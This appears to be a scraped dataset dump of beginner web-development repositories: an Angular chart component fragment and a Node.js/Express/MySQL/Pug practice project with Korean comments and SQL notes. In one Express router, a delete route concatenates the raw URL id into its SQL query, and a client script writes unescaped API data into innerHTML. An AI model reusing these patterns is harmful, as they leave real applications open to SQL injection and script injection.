{text: 'Two', cols: 1, rows: 1, color: 'white'},
{text: 'Three', cols: 1, rows: 1, color: 'white'},
];
ngOnInit() {
this._emp.getSales().subscribe(data => {
this.barChartLabels = Object.keys(data);
this.barChartLabels.forEach(label => {
this.barChartData[0].data.push(data[label]['volumeSales']);
this.barChartData[1].data.push(data[label]['valueSales']);
});
    });
this.longRunningMethod();
}
  ngOnDestroy(){
    // mdeiaSub is never assigned in this component, so guard before unsubscribing
    if (this.mdeiaSub) { this.mdeiaSub.unsubscribe(); }
  }
arr = [];
async longRunningMethod() {
try{
let response = await fetch(this.apiURL);
let readAbleData = await response.json();
this.arr = readAbleData.data;
console.log(readAbleData)
} catch(error){console.log(error)}
}
showDetails = (_ID) => {
this._emp.isNewDetails = true;
this._emp.firstStep = false;
this._emp.userId = _ID;
console.log(`this._emp.userId = ${this._emp.userId}`)
if(this._emp.userId==1){
this._emp.firstRunningMethod();
}
if(this._emp.userId==2){
this._emp.secondRunningMethod();
}
if(this._emp.userId==3){
this._emp.thirdRunningMethod();
}
if(this._emp.userId==4){
this._emp.fourthRunningMethod();
}
if(this._emp.userId==5){
this._emp.fifthRunningMethod();
}
if(this._emp.userId==6){
this._emp.sixthRunningMethod();
}
}
}
|
33babbc3636c0d009a88389dbba3769802eb2324
|
[
"TypeScript"
] | 4 |
TypeScript
|
SoniaChauhan/dashboardProject
|
ac44137504ba0d2e6836f841d8b8178be1ce2f7c
|
21d8683871b7a18ed8817e0616e9a2a19b10e255
|
refs/heads/master
|
<file_sep>const zp = n => n<10 ? "0"+n : n;
const isoDate = (d, type) => {
/*
type: 1 => 2019-11-03 11:11:11
type: 2 => 19-11-03
type: 3 => 2019년 11월 03일
*/
let types = type? type: 1;
let year = d.getFullYear();
let month = zp(d.getMonth() + 1);
let day = zp(d.getDate());
let hour = zp(d.getHours());
let min = zp(d.getMinutes());
let sec = zp(d.getSeconds());
switch(types) {
case 2:
return String(year).substr(2)+"-"+month+"-"+day;
break;
case 3:
return year+"년 "+month+"월 "+day+"일";
break;
default:
return year+"-"+month+"-"+day+" "+hour+":"+min+":"+sec;
}
}
const js2Iso = (obj, field) => {
const reData = obj.map((item) => {
item[field] = isoDate(item[field]);
return item;
});
return reData;
}
module.exports = {zp, isoDate, js2Iso};<file_sep># SQL (Structured Query Language) Statements
## 1. Inserting data
~~~sql
INSERT INTO users (username, age, wdate) VALUES ("홍길동", 28, "2019-11-03 10:20:25");
INSERT INTO users SET username="홍길만", age=25, wdate="2019-11-03 10:24:25";
~~~
## 2. Fetching data
~~~sql
/* SELECT (field, field) FROM (table); */
SELECT id, username, age, wdate FROM users;
SELECT username, age FROM users;
SELECT * FROM users;
SELECT * FROM users ORDER BY id ASC;
SELECT * FROM users ORDER BY id DESC;
~~~
## 3. Deleting data
~~~sql
DELETE FROM users WHERE id=2; /* delete id=2 */
DELETE FROM users WHERE id>2000; /* delete id > 2000 */
/* id > 2000 and username matches (% is a wildcard): username like '%길동%' => anything may come before or after 길동. */
DELETE FROM users WHERE id>2000 AND username like '%길동%';
DELETE FROM users WHERE username='홍길동';
~~~
## 4. Updating data
~~~sql
UPDATE table_name SET field1='value', field2='value2' WHERE field=value;
UPDATE users SET username='홍길동', age=25 WHERE id=3;
~~~<file_sep>const mysql = require('mysql2/promise');
const conn = mysql.createPool({
host: "localhost",
port: 3307,
user: "test",
password: "<PASSWORD>",
database: "node",
connectionLimit: 10,
waitForConnections: true
});
const sqlExec = async (sql, sqlVals) => {
const connect = await conn.getConnection();
const result = await connect.query(sql, sqlVals);
connect.release();
return result;
}
module.exports = {mysql, conn, sqlExec};<file_sep>const express = require("express");
const app = express();
const port = 3000;
app.listen(port, ()=> {
console.log("http://127.0.0.1:"+3000);
});
// mysql.js
const mysql = require('mysql');
const conn = mysql.createPool({
host: "localhost",
port: 3307,
user: "test",
password: "<PASSWORD>",
database: "node",
connectionLimit: 10
});
/* var conn = mysql.createConnection({
host : 'localhost',
user : 'test',
port : '3307',
password : '<PASSWORD>',
database : 'node'
}); */
// util module
const bodyParser = require("body-parser");
app.use(bodyParser.urlencoded({extended: false}));
// static root setup
app.use("/", express.static("./public"));
// PUG setup
app.set("view engine", "pug"); // set the view engine
app.set("views", "./views"); // set the folder where the views are stored
app.locals.pretty = true; // pretty-print the source sent in the response
const users = [
{id: 1, name: "홍길동", age: 25},
{id: 2, name: "홍길순", age: 28},
{id: 3, name: "홍길만", age: 32},
];
app.get(["/pug", "/pug/:type"], (req, res) => {
let name = req.query.name;
let titleChk = req.query.titleChk;
let type = req.params.type;
const vals = {name, title: "PUG연습", users, titleChk};
switch(type) {
case "include":
res.render("include", vals);
break;
default:
res.render("block", vals);
break;
}
});
app.get(["/api", "/api/:type"], (req, res) => {
let type = req.params.type; // undefined
if(!type) type = "list";
switch(type) {
case "list":
res.json({
result : users
});
break;
default :
break;
}
});
app.get(["/date", "/date/:type"], (req, res) => {
let type = req.params.type;
if(!type) type = "ts";
switch(type) {
case "ts":
res.send('<h1>'+String(new Date().getTime())+'</h1>');
break;
default:
res.send('<h1>'+String(new Date())+'</h1>');
break;
}
});
app.get("/insert-in", insertIn);
function insertIn(req, res) {
    const vals = {tit: "Data input", subTit: "Sign up"};
res.render("sql/insert", vals);
}
// basic mysql handling - createConnection()
app.post("/insert/:type", insertFn);
function insertFn(req, res) {
const type = req.params.type;
switch(type) {
case "save":
var username = req.body.username;
var age = req.body.age;
var wdate = "2019-11-03 11:55:55";
//var sql = `INSERT INTO users SET username="${username}", age=${age}, wdate="${wdate}"`;
var sql = "INSERT INTO users SET username=?, age=?, wdate=?";
var sqlVals = [username, age, wdate];
conn.connect();
conn.query(sql, sqlVals, function (error, results, fields) {
if (error) {
console.log(error)
res.send("Error");
}
else {
console.log('The solution is: ', results);
if(results.affectedRows == 1) {
                    res.send("Saved successfully.");
                }
                else {
                    res.send("Failed to save the data.");
}
}
});
conn.end();
break;
case "save-pool":
var username = req.body.username;
var age = req.body.age;
var wdate = "2019-11-03 11:55:55";
var sql = "INSERT INTO users SET username=?, age=?, wdate=?";
var sqlVals = [username, age, wdate];
conn.getConnection((error, connect) => {
if(error) console.log(error);
else {
connect.query(sql, sqlVals, (error, results, fields) => {
if(error) console.log(error);
else {
res.json(results);
}
connect.release();
});
}
});
break;
default:
            res.send("Cancelled");
break;
}
}<file_sep># PUG - View Engine
## 1. Originally created as Jade -> renamed to pug
## 2. Features (https://pugjs.org)
### A. A Zen-coding-style view engine
### B. Code with either spaces or tabs, but only one of the two - indentation matters
### C. Tag attributes are declared inside ()
### D. To put a string inside a tag (e.g.: title string)
### E. To put a variable inside a tag (e.g.: title= varName)
### F. each value in array : pug's built-in loop
### G. if condition : pug's built-in conditional
### H. Use '-' to write plain JavaScript
### I. Comments are written as //- (a // comment shows up in the HTML output)
### J. Structure is expressed with include and layout
~~~pug
html(lang="ko")
  head
    title This is the title.
  body
    div= content
    - var arr = [1, 2, 3, 4, 5]
    each i in arr
      if i%2 == 0
        div= `${i} (even)`
      else
        div= `${i} (odd)`
~~~
## 3. Usage with Node.js (express)
~~~js
app.set("view engine", "pug"); // when using pug
app.set("view engine", "ejs"); // when using ejs
app.set("views", "./views");
app.locals.pretty = true; // send the client nicely formatted source
app.get("/sample", (req, res) => {
    const vals = {} // pass variables to the template as a JavaScript object
res.render("sample", vals);
});
~~~
<file_sep>var xhr = new XMLHttpRequest();
xhr.open("GET", "/api/list");
xhr.addEventListener("load", function(){
var res = JSON.parse(this.responseText);
var html = '';
for(var i in res.result) {
html += '<tr>';
html += '<td>'+res.result[i].id+'</td>';
html += '<td>'+res.result[i].name+'</td>';
html += '<td>'+res.result[i].age+'</td>';
html += '</tr>';
}
document.querySelector(".table > tbody").innerHTML = html;
});
xhr.send();<file_sep>const express = require("express");
const app = express();
const port = 3000;
app.listen(port, ()=> {
console.log("http://1172.16.31.10:"+3000);
});
// node module
const bodyParser = require("body-parser");
app.use(bodyParser.urlencoded({extended: false}));
// my module
/*
const db = require("./modules/mysql-conn");
const mysql = db.mysql;
const conn = db.conn;
const sqlExec = db.sqlExec;
*/
const {mysql, conn, sqlExec} = require("./modules/mysql-conn");
const {alertLoc} = require("./modules/util-loc");
const {zp, isoDate, js2Iso} = require("./modules/util-date");
// static root setup
app.use("/", express.static("./public"));
// PUG setup
app.set("view engine", "pug");
app.set("views", "./views");
app.locals.pretty = true;
// Router - GET
app.get(["/user/:type", "/user/:type/:id"], userGet); // wr, li
// Router - POST
app.post("/user/:type", userPost);
// Router CB - GET
function userGet(req, res) {
const type = req.params.type;
const id = req.params.id;
switch(type) {
case "wr":
            const vals = {tit: "Data input", subTit: "Sign up"};
res.render("sql/insert", vals);
break;
case "li":
(async () => {
let sql = "SELECT * FROM users ORDER BY id DESC";
let result = await sqlExec(sql);
                const vals = {
                    tit: "Data output",
                    subTit: "Member list",
                    datas: js2Iso(result[0], "wdate")
};
res.render("sql/list", vals);
})();
break;
case "rm":
(async () => {
const sql = "DELETE FROM users WHERE id="+id;
const result = await sqlExec(sql);
                if(result[0].affectedRows > 0) res.send(alertLoc("Deleted.", "/user/li"));
                else res.send(alertLoc("Deletion failed. Please contact the administrator.", "/user/li"));
})();
break;
case "up":
(async ()=>{
let sql = "SELECT * FROM users WHERE id=?";
let sqlVals = [req.params.id];
let result = await sqlExec(sql, sqlVals);
                let vals = {
                    tit: "Data update",
                    subTit: "Edit member",
                    datas: result[0][0]
                }
                res.render("sql/update", vals);
            })();
            break;
default:
break;
}
}
// Router CB - POST
function userPost(req, res) {
let type = req.params.type;
let username = req.body.username;
let age = req.body.age;
let id = req.body.id;
let sql = '';
let sqlVals = [];
let result = null;
switch(type) {
case "save":
(async () => {
sql = "INSERT INTO users SET username=?, age=?, wdate=?";
sqlVals = [username, age, isoDate(new Date())];
result = await sqlExec(sql, sqlVals);
                res.send(alertLoc("Saved.", "/user/li"));
})();
break;
case "update":
(async () => {
sql = "UPDATE users SET username=?, age=? WHERE id=?";
sqlVals = [username, age, id];
result = await sqlExec(sql, sqlVals);
                if(result[0].affectedRows > 0) res.send(alertLoc("Updated.", "/user/li"));
                else res.send(alertLoc("Update failed.", "/user/li"));
})();
break;
default:
break;
}
}
|
b6078fd709d88a04af7e80f254de513fa343827c
|
[
"JavaScript",
"Markdown"
] | 7 |
JavaScript
|
booldook/2019-kn-node-04.pug
|
a4fd4de98773d86c564f03639c4c913e7d46856b
|
61809c961da00f43547f2a4c3e8b586b0b8bf52b
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.